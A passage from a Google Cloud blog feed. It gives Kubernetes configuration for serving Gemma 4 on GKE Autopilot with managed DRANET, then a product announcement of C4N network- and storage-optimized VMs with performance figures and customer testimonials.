    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: resource.k8s.io/v1\r\nkind: ResourceClaimTemplate\r\nmetadata:\r\n  name: all-mrdma\r\nspec:\r\n  spec:\r\n    devices:\r\n      requests:\r\n      - name: req-mrdma\r\n        exactly:\r\n          deviceClassName: mrdma.google.com\r\n          allocationMode: All&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4910&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#deploy-workload-tpu" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Non-RDMA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deviceClassName: netdev.google.com&lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt; &lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;ResourceClaimTemplate example for TPUs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: resource.k8s.io/v1\r\nkind: ResourceClaimTemplate\r\nmetadata:\r\n  name: all-netdev\r\nspec:\r\n  spec:\r\n    devices:\r\n      requests:\r\n      - name: req-netdev\r\n        exactly:\r\n          deviceClassName: netdev.google.com\r\n          allocationMode: All&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a42b0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #5f6368;"&gt;4. Deploy workload and reference ComputeClass and ResourceClaim&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a secret in your cluster&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl create secret generic hf-secret \\\r\n  --from-literal=hf_token=${HF_TOKEN}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4310&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Example deploying GPUs &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n  name: gemma-4-31-deploy\r\nspec:\r\n  replicas: 2\r\n  selector:\r\n    matchLabels:\r\n      app: gemma4\r\n  template:\r\n    metadata:\r\n      labels:\r\n        app: gemma4\r\n        ai.gke.io/model: gemma-4-31b\r\n        ai.gke.io/inference-server: vllm\r\n    spec:\r\n      resourceClaims:\r\n      - name: rdma-claim        \r\n        resourceClaimTemplateName: all-mrdma\r\n      containers:\r\n      - name: vllm-inference\r\n        image: us-docker.pkg.dev/vertex-ai/vertex-vision-model-garden-dockers/pytorch-vllm-serve:gemma4\r\n        resources:\r\n          requests:\r\n            cpu: &amp;quot;10&amp;quot;\r\n            memory: &amp;quot;1000Gi&amp;quot;\r\n            ephemeral-storage: &amp;quot;1Ti&amp;quot;\r\n            nvidia.com/gpu: &amp;quot;8&amp;quot;\r\n          limits:\r\n            cpu: &amp;quot;10&amp;quot;\r\n            memory: &amp;quot;1000Gi&amp;quot;\r\n            ephemeral-storage: &amp;quot;1Ti&amp;quot;\r\n            nvidia.com/gpu: &amp;quot;8&amp;quot;\r\n          claims:\r\n          - name: rdma-claim\r\n        command: [&amp;quot;python3&amp;quot;, &amp;quot;-m&amp;quot;, &amp;quot;vllm.entrypoints.openai.api_server&amp;quot;]\r\n        args:\r\n        - --model=$(MODEL_ID)\r\n        - --tensor-parallel-size=8\r\n        - --host=0.0.0.0\r\n        - --port=8000\r\n        - --max-model-len=131072\r\n        - --max-num-seqs=16\r\n        - --enable-chunked-prefill\r\n        - --gpu-memory-utilization=0.90\r\n        env:\r\n        - name: MODEL_ID\r\n          value: google/gemma-4-31B\r\n        - name: HUGGING_FACE_HUB_TOKEN\r\n          valueFrom:\r\n            secretKeyRef:\r\n              name: hf-secret\r\n              key: hf_token\r\n        volumeMounts:\r\n        - mountPath: /dev/shm\r\n          name: dshm\r\n        startupProbe:\r\n          httpGet:\r\n            path: /health\r\n            port: 8000\r\n          failureThreshold: 240\r\n          periodSeconds: 10\r\n        livenessProbe:\r\n          httpGet:\r\n            path: /health\r\n            port: 8000\r\n          periodSeconds: 10\r\n        readinessProbe:\r\n          httpGet:\r\n            path: /health\r\n            port: 8000\r\n          periodSeconds: 5\r\n      volumes:\r\n      - name: dshm\r\n        emptyDir:\r\n          medium: Memory\r\n      nodeSelector:\r\n        cloud.google.com/compute-class: dranet-a4-computeclass&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4340&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notice how the deployment references the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ResourceClaimTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ComputeClass&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. When this kicks off, it triggers a scale-up operation. GKE Autopilot reads the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ComputeClass&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to provision the specific node type and to configure managed DRANET networking. Meanwhile, the resource claim acts as the bridge, binding your Pods directly to the accelerators on those nodes. This process works exactly the same for TPUs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Next Steps&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Take a deeper dive into GKE managed DRANET and autopilot with these resources:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Hands-on Lab: &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/codelabs/gke-autopilot-tpus-dranet-gemma#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Autopilot clusters with TPUs, GKE managed DRANET and Gemma 4&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Document set: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/config-auto-net-for-accelerators" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;DRANET&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Documentation: &lt;/span&gt;&lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;a href="https://docs.cloud.google.com/ai-hypercomputer/docs/overview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Hypercomputer&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Want to ask a question, find out more, or share a thought? Please connect with me on &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/ammett/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Linkedin&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/autopilot-clusters-with-gke-managed-dranet-gpus-and-tpus" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-09T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/compute/c4n-network-and-storage-optimized-vms</id>
    <title>C4N, now GA: Delivering cloud’s highest per vCPU network and block storage I/O for x86 workloads</title>
    <updated>2026-07-08T20:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;As organizations scale modern workloads — from high-throughput databases and network/security appliances to real-time analytics and AI/ML inference — network and block storage performance can quickly become a bottleneck. Standard virtual machines often struggle to balance compute efficiency with the high-volume data-transfer demands of these applications.&lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud Next ‘26, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/whats-new-in-compute-at-next26?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we announced C4N in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, our first network- and block-storage-optimized Google Compute Engine instance that’s purpose-built to eliminate I/O bottlenecks for demanding enterprise applications, and today, it is &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;generally available&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Built on Google's custom-designed &lt;/span&gt;&lt;a href="https://cloud.google.com/titanium?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Titanium&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; offload architecture, C4N instances offload network and storage tasks to dedicated hardware to unlock incredible performance and compute efficiency. C4N offers up to 400 Gbps of network bandwidth and a market-leading 95 million packets per second (MPPS) — &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;nearly 33% higher network bandwidth per vCPU and 224% faster packet processing performance than comparable Intel-based offerings at other hyperscalers&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This performance makes C4N a great fit for network-intensive applications such as virtual appliances (e.g., next-gen firewalls, virtual routers, load balancers, DDoS mitigation), large-scale data analytics, telco applications (5G UPF), distributed compute and CPU-based AI/ML workloads. &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Paired with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/disks/hd-types/hyperdisk-extreme"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Hyperdisk Extreme&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, our high-performance block storage, C4N also delivers Compute Engine’s highest block storage performance, scaling up to 25 GiB/s of storage bandwidth and 1M IOPS &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;— nearly 33% higher storage bandwidth and 39% more IOPS per vCPU versus comparable Intel-based offerings, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;making them a strong choice for large-scale databases, high-performance file systems, in-memory databases, and other workloads that benefit from high block storage performance&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Engineered specifically to deliver predictable, high-throughput I/O performance for networking, packets-per-second-bound and storage-optimized applications, C4N allows customers to scale network, storage, and compute resources more precisely to meet specific workload requirements, delivering significant TCO benefits by eliminating the need to over-provision resources just to meet I/O demands. &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;C4N is powered by 5th Gen Intel® Xeon® Scalable processors (code-named Emerald Rapids).&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“Google Cloud’s introduction of C4N highlights how infrastructure innovation and a strong silicon foundation can help customers address increasingly data-intensive workloads. With Intel Xeon and Custom Infrastructure Processing Unit (IPU), C4N delivers the performance and efficiency needed for demanding network optimized environments.” &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;– Srini Krishna, Intel Fellow, Data Center products, Intel&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What’s new: Scaling massive data layers with C4N &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our network-optimized C4N instances are designed to deliver predictable, high-performance I/O at scale. By providing consistent bandwidth, packet-processing performance (PPS), and IOPS scaling across all VM shapes and sizes, C4N helps ensure your most demanding data workloads run reliably. To achieve this, we have built deep resiliency into every layer of our infrastructure — from the host and fabric layers to redundant top-of-rack (ToR) switches — delivering continuous performance for your applications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compared to general-purpose C4 VMs, the network-optimized C4N delivers significant performance gains across both network and block storage vectors.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next-generation network performance&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Superior VM-to-VM network bandwidth&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Achieves up to 400 Gbps of VM-to-VM network bandwidth (an almost 4x increase in BW-per-vCPU over standard C4) and supports up to 50 Gbps single-flow bandwidth between C4N instances routed within the same VPC network. This provides non-blocking data delivery for high-throughput single-stream and multi-stream applications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced VM-to-internet performance: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Benefits from an 8x increase in internet egress network bandwidth, reaching up to 200 Gbps. It also features a nearly 32x increase in internet egress packet processing performance, scaling up to 48 MPPS.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimized I/O for smaller shapes: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Keeps your cloud bill lean by delivering up to 25–50 Gbps of network bandwidth specifically for 2–16 vCPU shapes, great for accelerating I/O-bound tasks without needing to over-provision compute. Furthermore, these smaller shapes introduce predictable, steady-state baseline bandwidth limits to provide consistent performance at a lower cost.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced out-of-the-box networking&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: gVNIC interfaces on C4N now start with more Tx/Rx queues by default, scaling with vCPUs up to a maximum of 64 (in comparison to 16 queues on C4/C4D).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shorter Google Cloud Storage transfer times: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;C4N VMs now offer up to a 2x increase in bandwidth to retrieve and store large volumes of data from Cloud Storage, boosting performance for analytics, AI/ML, and backup workloads. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Better yet, this &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;performance is available out of the box, with no add-ons. Designed for high performance from the get-go, C4N offers maximum performance without needing to purchase or configure premium add-ons like &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/networking/configure-vm-with-high-bandwidth-configuration"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Tier_1 networking&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Dynamic storage performance with Hyperdisk&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The C4N instance family, when combined with Hyperdisk, can help dynamically tune storage performance, latency, and throughput independently of your compute instance sizing to deliver high block storage performance for your applications. C4N supports the complete Hyperdisk portfolio, including Hyperdisk Balanced, Balanced High Availability, Extreme, Throughput, and ML block storage options.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Hyperdisk Extreme:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; C4N with Hyperdisk Extreme provides low-latency, high-speed data access for modern databases and enterprise AI applications, with up to 25 GiB/s of block storage throughput and nearly 1M IOPS, a 2x increase in storage performance over C4. Also, exclusive to network optimized machine series such as C4N, we now offer Hyperdisk Extreme across all machine sizes — even down to the smallest 2 vCPU sizes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Hyperdisk Balanced&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Delivering the highest throughput and IOPS for general-purpose block storage in the Compute Engine portfolio, Hyperdisk Balanced on C4N scales up to 20 GiB/s of block storage throughput and nearly 640K IOPS. This makes it a highly cost-effective option for running storage-intensive applications at scale.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, C4N’s network and storage optimizations combine for tremendous impact in &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;real-world applications:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Web serving:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Up to 1.5x additional Nginx requests per second compared to C4 for typical web request sizes (100–300Kb), significantly boosting capacity for network-bound web applications&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Databases&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Up to 45% better queries per second (QPS) for MySQL when data resides primarily on disk than equivalent C4 VMs&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;What customers are saying&lt;/span&gt;&lt;/h3&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Industry leaders are already proving that workload-optimized infrastructure is the engine for transformation. Here is how our customers are leveraging the network-optimized power of C4N:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="ericsson" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ericsson_run6NFp.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“5G Core workloads are inherently network-heavy, demanding high-throughput packet processing and deterministic latency that standard public cloud instances often struggle to maintain at scale. By leveraging the Google Cloud C4N compute family, we’ve found the ideal engine for Ericsson On-Demand. The C4N’s architectural focus on network-optimized compute allows our 5G Core-as-a-Service to reach unprecedented throughput levels — like our recent 1 Tbps milestone — while maintaining the carrier-grade reliability our customers expect. It’s no longer just about cloud-native; with C4N, we are delivering network-native performance in a public cloud environment.” -&lt;/i&gt; Eric Parsons, VP, Head of Ericsson On-Demand, Ericsson&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="teradata" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/teradata.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“Teradata's Autonomous Knowledge Platform unifies production-grade AI, analytics, and data into a single integrated system — providing the context, governance, and performance backbone autonomous AI demands at scale. Customers rely on Teradata to run mission-critical, highly I/O-intensive workloads where performance and cost control directly determine value.&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;Google Cloud C4N instances are well suited for these demanding workloads, delivering strong price-performance and supporting more efficient, optimized deployments. By leveraging C4N on Google Cloud, Teradata Cloud can help customers accelerate from insight to action — scaling enterprise intelligence with confidence and driving greater impact from their data and AI investments”&lt;/i&gt; - Kevin Dougherty, Senior Director of Product Management, Core Platform, Teradata&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="netapp" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/netapp.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“With the next-generation network and storage bandwidth of C4N VMs, Google Cloud NetApp Volumes will unlock new levels of performance to support our customers’ most demanding AI workloads. By collaborating to extend Google Cloud NetApp Volumes support for the C4N VM family, Google and NetApp are deepening our partnership to address real customer challenges. Together, we’re delivering data-in-place AI and analytics solutions that simplify architectures, maximize performance, and turn data into impact.” -&lt;/i&gt; Pravjit Tiwana, Senior Vice President and General Manager of Cloud Storage and Services, NetApp&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="sycomp" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/sycomp.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;"Most Compute Engine instances ship with a single high-speed network interface. The new C4N doubles the bandwidth potential with two 200 GbE interfaces. That architectural shift is significant. It means we can dedicate both networks entirely to storage traffic, doubling the available bandwidth for data-intensive workloads, and achieving 2x storage performance over the previous generation. The C4N was announced just weeks ago and is already active in Sycomp's test environment, ensuring our customers can evaluate the latest GCP capabilities without delay. Google Cloud’s published maximum hyperdisk balanced performance for the C4N is 20 GiB/s. In our tests, with three storage servers Sycomp achieved 58.5 GiB/s on read and 58.6 GiB/s on write, with ten C4N storage servers we achieved 195 GiB/s read and write — 97% of the theoretical ceiling with zero platform-specific tuning. That's a strong starting point, and there's measurable room to close the remaining gap through configuration work we can finetune.&lt;/i&gt; &lt;b&gt;&lt;i&gt;The C4N isn't just faster — it changes the price-performance equation for storage workloads on Google Cloud.&lt;/i&gt;&lt;/b&gt;" - Scott Fadden, Senior HPC Solutions Architect, Sycomp&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="clipper db" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/clipper_db.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“At ClipperDB Technologies, our mission is to drive down the cost and drive up the performance of large-scale Spark analytics. Google Cloud’s C4N instances are the perfect compute engine for our fully native architecture. C4N’s substantial increase in network bandwidth per vCPU combined with large memory configurations and 5th Generation Intel Xeon processors align with ClipperDB’s precise parallel cloud-store prefetching and caching, concurrent dataflow native batch pipelines, streaming no-copy exchange, and cloud store checkpoint fault tolerance to radically accelerate and cost reduce Spark workloads with disaggregated Cloud Storage datalakes.&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;The results speak for themselves: across industry-standard TPC-DS benchmarks, ClipperDB+C4N delivered&lt;/i&gt; &lt;b&gt;&lt;i&gt;over 3x lower cost per query and up to 11x faster analytics&lt;/i&gt;&lt;/b&gt;&lt;i&gt;, all while maintaining 100% Spark compatibility. We can’t wait to see customers dramatically improve their Spark workload price-performance with C4N coupled with Clipper DB Accelerator." -&lt;/i&gt; John Busch, CEO, ClipperDB Technologies&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;A deeper look at C4N shapes and specs&lt;/strong&gt;&lt;/h3&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;C4N instances are available in nine different sizes ranging from 2-192 vCPUs and up to 1.5 TB of DDR5 memory, offering predefined shapes in high-cpu, standard, and high-mem configurations. &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;For applications that benefit from caching and high-speed, low-latency local storage, C4N VM instances are equipped with up to 12 TiB of latest Titanium SSDs (coming soon, Sign-up&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://forms.gle/ehRSqssSEavKt1Fh7" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to request C4N Local-SSD preview access). For workloads that require direct access to the machine's resources (e.g., hypervisors, container platforms), &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;where nested virtualization does not meet the workload’s performance requirements&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, or have special performance monitoring or licensing needs, we are introducing C4N bare metal shapes. Coming soon, these native bare metal shapes will offer the same network and storage I/O performance as their virtual machine counterparts. Google Cloud customers can use C4N instances with Compute Engine and Google Kubernetes Engine (GKE), with support for other services coming soon.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
